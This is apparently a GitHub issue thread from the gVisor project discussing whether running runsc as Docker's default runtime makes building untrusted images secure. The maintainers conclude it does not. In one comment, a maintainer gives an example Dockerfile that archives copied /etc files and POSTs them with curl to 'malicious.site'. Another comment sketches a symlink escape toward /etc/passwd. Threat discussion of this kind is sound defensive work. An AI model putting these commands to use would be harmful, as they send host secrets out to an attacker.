### ISSUE TITLE
Does running this as dockers default runtime make building arbitrary images secure?

### ISSUE THREAD

**Issue by nhooyr** [google/gvisor#176]
pretty much the title.

I want to build arbitrary Docker images in a secure manner. I’m aware there are builders for this but using gvisor would be convenient.

**Comment by amscanne** [comment]
I don’t think so. The Dockerfile format is pretty flexible with respect to moving data around at the host level and other features. Off the top of my head, I could imagine:

FROM base
CP /etc/* .
RUN tar -cvzf foo.tgz . && curl -X POST —data foo.tgz http://malicious.site
ENTRYPOINT /innocent-service

**Comment by amscanne** [comment]
Also: happy to discuss other aspects of what your goals are, here or on other issues.

**Comment by nhooyr** [comment]
Well I would not build in the root directory of the host for sure. Docker doesn’t let copying outside the build context afaik.

**Comment by amscanne** [comment]
It’s an interesting question. I’ll reopen for discussion.

My gut is that the model for Dockerfiles is unlikely to be built to defend against malicious contents. E.g. would it defend against this?

Directory:
Dockerfile
foo -> /etc

Contents of Dockerfile:
FROM base
COPY foo/passwd passwd
RUN curl ...

**Comment by nhooyr** [comment]
It would as it would not follow the symlink outside the build context.

**Comment by amscanne** [comment]
Interesting, it does seem to have solid handling for these kinds of simple symlink escapes. I'll need to think a bit more about it (and let others chime in).

**Comment by fvoznika** [comment]
I don't think we can claim it makes building images _secure_. Most Dockerfile commands are executed directly in the host and could be vulnerable if there is a bug in the code. For example, apart from symlink handling, `COPY --chown` may need to parse `/etc/passwd` from the container's image.

Using runsc as the default runtime will make `RUN` instructions execute inside the sandbox. Sure, `RUN` is the most worrisome command and isolating it is a already big step in the right direction. But you  also need to trust the handling of the other instructions that happen in the context of the host.

**Comment by nhooyr** [comment]
Going to close as it has been a while and I'm not sure if this is relevant anymore.
